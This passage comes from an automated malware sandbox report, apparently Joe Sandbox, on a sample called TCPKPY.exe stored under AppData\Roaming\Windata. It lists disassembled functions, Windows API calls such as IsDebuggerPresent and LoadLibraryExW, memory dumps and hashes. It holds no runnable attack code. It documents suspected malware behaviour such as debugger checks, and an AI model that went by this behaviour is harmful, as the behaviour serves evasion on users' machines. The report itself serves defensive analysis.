                                                                                                                  • Part of subcall function 00228EB2: GetModuleFileNameW.KERNEL32(00000000,002C0312,00000104,?,00000001,00220127), ref: 00228F44
                                                                                                                  • Part of subcall function 00228EB2: ___crtMessageBoxW.LIBCMT ref: 00228FF2
                                                                                                                  • Part of subcall function 00221D65: ___crtCorExitProcess.LIBCMT ref: 00221D6B
                                                                                                                  • Part of subcall function 00221D65: ExitProcess.KERNEL32 ref: 00221D74
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: 3bb4575f3ecc36d85123e32984dd436fdaa09652749656da0be2697e81e4cb13
                                                                                                                • Instruction ID: cec9b8b9d56b007868a69e302c36843c6461e5b5cf9c99cc98f17782d98fc316
                                                                                                                • Opcode Fuzzy Hash: 3bb4575f3ecc36d85123e32984dd436fdaa09652749656da0be2697e81e4cb13
                                                                                                                • Instruction Fuzzy Hash: 30019635632232BAE6217FE4BC45B7A334CAF82B61F110125FA05971D1DFF4DC608A65
                                                                                                                Function 0024C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 0024C45E
                                                                                                                  • Part of subcall function 002228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228DE
                                                                                                                  • Part of subcall function 002228CA: GetLastError.KERNEL32(00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228F0
                                                                                                                • _free.LIBCMT ref: 0024C46F
                                                                                                                • _free.LIBCMT ref: 0024C481
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                • Instruction ID: c22a35f75c4cf6d40d47b2281822d4e22238edabea63c4c082165a57d2ac5fa7
                                                                                                                • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                • Instruction Fuzzy Hash: 73E0C2A1223712F2CA6CADBD7940BB313CC2F04710B24182DF449D3142CF2CE8608434
                                                                                                                Function 0021058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
                                                                                                                • Opcode ID: 5917e3d93a2c90adb9e6ed89f15cce6f7eb4d4e30a6c9ceba630aa34125362b8
                                                                                                                • Instruction ID: 606aa2fed106fa00cab2879bd0009d332a43806ad96ecddbaab01bd2d0510223
                                                                                                                • Opcode Fuzzy Hash: 5917e3d93a2c90adb9e6ed89f15cce6f7eb4d4e30a6c9ceba630aa34125362b8
                                                                                                                • Instruction Fuzzy Hash: F522AD70528341DFD728DF14C490B6AB7E1BF98304F15895DE99A8B2A2C7B1E8E4CF42
                                                                                                                Function 0020131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002016F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002014EB), ref: 00201751
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0020159B
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00201612
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002758F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3815369404-0
                                                                                                                • Opcode ID: 35e3d6afc07dbe49017cb9c00c2ec06b6e3ef6ba253bbc5bf29c0f466c9d0484
                                                                                                                • Instruction ID: 2cd94d5eec9a0d0fc0aaede7a9d26a0fe05aabe7c3246a34ebf088624e96d1ab
                                                                                                                • Opcode Fuzzy Hash: 35e3d6afc07dbe49017cb9c00c2ec06b6e3ef6ba253bbc5bf29c0f466c9d0484
                                                                                                                • Instruction Fuzzy Hash: 57719EB49113418BC328DF5AB89BD55BBA8FB5B344394426ED00A873A3CB708474CF55
                                                                                                                Function 00204010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                • Opcode ID: ca6a7f8f326d0f518d674cb413b50dc7b334eacb5b1c560d0b7962b7f94844ef
                                                                                                                • Instruction ID: f91b089b0048c563cba15002892d3824cf2b8b2fe1061ec5a00da22ff32a07f3
                                                                                                                • Opcode Fuzzy Hash: ca6a7f8f326d0f518d674cb413b50dc7b334eacb5b1c560d0b7962b7f94844ef
                                                                                                                • Instruction Fuzzy Hash: AA419DF1A343589BCB15BF5488517BEBF638B15300F18C465EB86B71C3C6619EB48BA1
                                                                                                                Function 002034C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002734AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                • API String ID: 1029625771-2684727018
                                                                                                                • Opcode ID: 67af8025e150585e97225ba68e659c4237fcc29ef8db1d28c3b8ca358a470587
                                                                                                                • Instruction ID: 9956b1c71b35e6869af7312f46496449838f5d3dabe77b7f8b16ce18b6523517
                                                                                                                • Opcode Fuzzy Hash: 67af8025e150585e97225ba68e659c4237fcc29ef8db1d28c3b8ca358a470587
                                                                                                                • Instruction Fuzzy Hash: 85F0F47192520DAACF15EEB4D8919FFB7BCAE10310B108526E81592183EB759B29DB21
                                                                                                                Function 00201DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 0027DB31
                                                                                                                • IsWindow.USER32(00000000), ref: 0027DB6B
                                                                                                                  • Part of subcall function 00201F04: GetForegroundWindow.USER32 ref: 00201FBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground
                                                                                                                • String ID:
                                                                                                                • API String ID: 62970417-0
                                                                                                                • Opcode ID: e43b84fb0b02542c5db59dbfa054940248ae04473e7c97c934d54a937cbd9aae
                                                                                                                • Instruction ID: 7e83e349250c880d1d7aeb0b8dd13e3c1beb69beb3251876d91c927034257db7
                                                                                                                • Opcode Fuzzy Hash: e43b84fb0b02542c5db59dbfa054940248ae04473e7c97c934d54a937cbd9aae
                                                                                                                • Instruction Fuzzy Hash: 0621DF72220306AFDB11AF74C885BFE77AD9F80784F004429F95A87182DB70EE259B60
                                                                                                                Function 00203682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 002036E6
                                                                                                                  • Part of subcall function 00222025: __lock.LIBCMT ref: 0022202B
                                                                                                                  • Part of subcall function 002032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002032F6
                                                                                                                  • Part of subcall function 002032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0020330B
                                                                                                                  • Part of subcall function 0020374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0020376D
                                                                                                                  • Part of subcall function 0020374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0020377F
                                                                                                                  • Part of subcall function 0020374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,002C1120,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,002C1124,?,?), ref: 002037EE
                                                                                                                  • Part of subcall function 0020374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00203860
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00203726
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 924797094-0
                                                                                                                • Opcode ID: 8200e3b63acaac597a793a56018254d675b7a81f8ae5b74bbbd186c26caf75fb
                                                                                                                • Instruction ID: 7ab60933cbec7b44de46422f233f8a4697e50a64fb1830f94b5af5c756495517
                                                                                                                • Opcode Fuzzy Hash: 8200e3b63acaac597a793a56018254d675b7a81f8ae5b74bbbd186c26caf75fb
                                                                                                                • Instruction Fuzzy Hash: D5118E71918341EBC310DF65E84991ABBE9FF95710F40451EF844872B2EB7499A8CF92
                                                                                                                Function 0022F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___lock_fhandle.LIBCMT ref: 0022F7D9
                                                                                                                • __close_nolock.LIBCMT ref: 0022F7F2
                                                                                                                  • Part of subcall function 0022886A: __getptd_noexit.LIBCMT ref: 0022886A
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1046115767-0
                                                                                                                • Opcode ID: ecf5504f4ba1e808fca45b2ad479649c9b53529fb2cd10b6f81bda019d2ecfa5
                                                                                                                • Instruction ID: 2e073762f9b910907d4c22804054e9b9c2b7db2ff0c29136bffcf83951419526
                                                                                                                • Opcode Fuzzy Hash: ecf5504f4ba1e808fca45b2ad479649c9b53529fb2cd10b6f81bda019d2ecfa5
                                                                                                                • Instruction Fuzzy Hash: 87117032836674BED7517FE4BA46358B6705F42331F560370E5606B2E2CBF89D608AA2
                                                                                                                Function 0022010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002245EC: __FF_MSGBANNER.LIBCMT ref: 00224603
                                                                                                                  • Part of subcall function 002245EC: __NMSG_WRITE.LIBCMT ref: 0022460A
                                                                                                                  • Part of subcall function 002245EC: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
                                                                                                                • std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 00227495: RaiseException.KERNEL32(?,?,0020125D,002B6598,?,?,?,00220158,0020125D,002B6598,?,00000001), ref: 002274E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: 0a3a1e875ab327339896ef7ebe1d0ffcf4c3d4d7e07e29d896c9c00807b5f793
                                                                                                                • Instruction ID: ef57fb416c9c044f55adc274f40a994ed9b2cb84bda1dd92ed01cd663bbecfa6
                                                                                                                • Opcode Fuzzy Hash: 0a3a1e875ab327339896ef7ebe1d0ffcf4c3d4d7e07e29d896c9c00807b5f793
                                                                                                                • Instruction Fuzzy Hash: 89F0A43912823EB6C715BEE8F8429DEB7ECAF04350F500415F908961D2DBB09AB49BA5
                                                                                                                Function 00224274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __lock_file.LIBCMT ref: 002242B9
                                                                                                                  • Part of subcall function 00225A9F: __lock.LIBCMT ref: 00225AC2
                                                                                                                • __fclose_nolock.LIBCMT ref: 002242C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: f638e4a79d55984835245af045d1059b3e5f6d2dfca4d3c9eff93f3ae78dabb2
                                                                                                                • Instruction ID: 1842b09e258cf7933cb07f1585f96fb317e45defb9b1a540d1bde221981d32aa
                                                                                                                • Opcode Fuzzy Hash: f638e4a79d55984835245af045d1059b3e5f6d2dfca4d3c9eff93f3ae78dabb2
                                                                                                                • Instruction Fuzzy Hash: 3FF06D31935635FAE720BBF6A80275EA7E06F41334F25830ABC249A1C1CBBC99219F51
                                                                                                                Function 00221D65 Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 00221D6B
                                                                                                                  • Part of subcall function 00221D33: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,0028ED50,?,?,00221D70,00220127,?,00228A37,000000FF,0000001E,002B68C8,00000008,0022899B,00220127,00220127), ref: 00221D42
                                                                                                                  • Part of subcall function 00221D33: GetProcAddress.KERNEL32(0028ED50,CorExitProcess), ref: 00221D54
                                                                                                                • ExitProcess.KERNEL32 ref: 00221D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 2427264223-0
                                                                                                                • Opcode ID: 9e9193bf0232e7c49de66b60bd3fac19bb28cd1a49119d38e2d62838ce44d014
                                                                                                                • Instruction ID: 4ab2cb98947c9d1034523e32ec5929fde5ade588f85b51f8a692525d9c89d83e
                                                                                                                • Opcode Fuzzy Hash: 9e9193bf0232e7c49de66b60bd3fac19bb28cd1a49119d38e2d62838ce44d014
                                                                                                                • Instruction Fuzzy Hash: B4B09230000108BBCB012F51ED0A8493F2AEB50390B008024F80408071DBB2AAA19EC1
                                                                                                                Function 0020B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                • Instruction ID: 8a4677540ffc127d07582d5b60425e7f25d64441499e187a445c41f879761060
                                                                                                                • Opcode Fuzzy Hash: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                • Instruction Fuzzy Hash: 38419C7A220702DFC724DF19D481A62F7E0FF89360714C42EE99A8B7A2D770E861CB50
                                                                                                                Function 0027AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 95cbac6c46cc5f765bf5c898861bce114b7126df5e32a566b6dd58616bfdc5cf
                                                                                                                • Instruction ID: 2a9201b9af5490295231ccf95d26306b1ecc9b8ebcde4455cf5cfcc2a746cee5
                                                                                                                • Opcode Fuzzy Hash: 95cbac6c46cc5f765bf5c898861bce114b7126df5e32a566b6dd58616bfdc5cf
                                                                                                                • Instruction Fuzzy Hash: AC418B70514251CFEB24CF18C484B5ABBE1BF99318F19889CE9994B362C372F8A5CF42
                                                                                                                Function 00203F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00203F90
                                                                                                                  • Part of subcall function 00224129: __wfsopen.LIBCMT ref: 00224134
                                                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002034E2,?,00000001), ref: 00203FCD
                                                                                                                  • Part of subcall function 00203E78: FreeLibrary.KERNEL32(00000000), ref: 00203EAB
                                                                                                                  • Part of subcall function 00204010: _memmove.LIBCMT ref: 0020405A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
